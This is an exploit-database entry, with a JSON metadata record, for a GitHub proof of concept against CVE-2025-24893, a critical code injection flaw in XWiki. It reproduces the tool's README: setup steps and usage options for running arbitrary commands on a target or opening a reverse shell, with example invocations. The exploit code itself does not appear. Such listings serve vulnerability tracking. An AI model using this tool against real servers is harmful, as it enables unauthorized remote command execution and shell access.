Exploit for Code Injection in Xwiki_E5B5FB6C-FB47-5B80-9C21-F45B725632D3

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

# CVE-2025-24893

Install bun:

```bash
curl -fsSL https://bun.com/install | bash
```

To install dependencies:

```bash
bun install
```

To run:

```bash
bun run CVE-2025-24893.ts
```

This project was created using `bun init` in bun v1.2.19. [Bun](https://bun.com) is a fast all-in-one JavaScript runtime.

## How to use:

```
Usage: bun CVE-2025-24893.ts [options]

Options:
-u, --url The target URL to interact with.
-i, --ip The IP address for a reverse shell connection.
-p, --port The port number for the reverse shell.
-r, --rverse Open a reverse shell connection.
-c, --cmd Execute a specific command.

Examples:
# Execute a command on a target URL
bun CVE-2025-24893.ts --url http://example.com --cmd "ls -la"

# Open a reverse shell
bun CVE-2025-24893.ts --rverse --ip 127.0.0.1 --port 4444
```

## Disclaimer

This exploit and guide are for educational purposes only. Use this information responsibly and only on systems you have explicit permission to test. Unauthorized exploitation of systems is illegal and unethical. The authors and contributors are not responsible for any misuse or damage caused by this information.

Visit Original Source

Basic Information

ID E5B5FB6C-FB47-5B80-9C21-F45B725632D3

Published Aug 7, 2025 at 22:34

Modified Aug 9, 2025 at 13:28

{
    "lastseen": "2025-08-13T08:36:42",
    "description": "# CVE-2025-24893\n\nInstall bun:\n\n```bash\ncurl -fsSL https://bun.com/install | bash\n```\n\nTo install dependencies:\n\n```bash\nbun install\n```\n\nTo run:\n\n```bash\nbun run CVE-2025-24893.ts\n```\n\nThis project was created using `bun init` in bun v1.2.19. [Bun](https://bun.com) is a fast all-in-one JavaScript runtime.\n\n## How to use:\n\n```\nUsage: bun CVE-2025-24893.ts [options]\n\nOptions:\n  -u, --url            The target URL to interact with.\n  -i, --ip      The IP address for a reverse shell connection.\n  -p, --port   The port number for the reverse shell.\n  -r, --rverse              Open a reverse shell connection.\n  -c, --cmd        Execute a specific command.\n\nExamples:\n  # Execute a command on a target URL\n  bun CVE-2025-24893.ts --url http://example.com --cmd \"ls -la\"\n\n  # Open a reverse shell\n  bun CVE-2025-24893.ts --rverse --ip 127.0.0.1 --port 4444\n```\n\n## Disclaimer\n\nThis exploit and guide are for educational purposes only. Use this information responsibly and only on systems you have explicit permission to test. Unauthorized exploitation of systems is illegal and unethical. The authors and contributors are not responsible for any misuse or damage caused by this information.\n",
    "published": "2025-08-07T22:34:07",
    "modified": "2025-08-09T13:28:35",
    "type": "githubexploit",
    "title": "Exploit for Code Injection in Xwiki",
    "source": "",
    "references": "",
    "id": "E5B5FB6C-FB47-5B80-9C21-F45B725632D3",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-24893"
    ],
    "sourceData": "",
    "sourceHref": "",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://github.com/Th3Gl0w/CVE-2025-24893-POC",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

💭 Join the Security Discussion ❌ Cancel Reply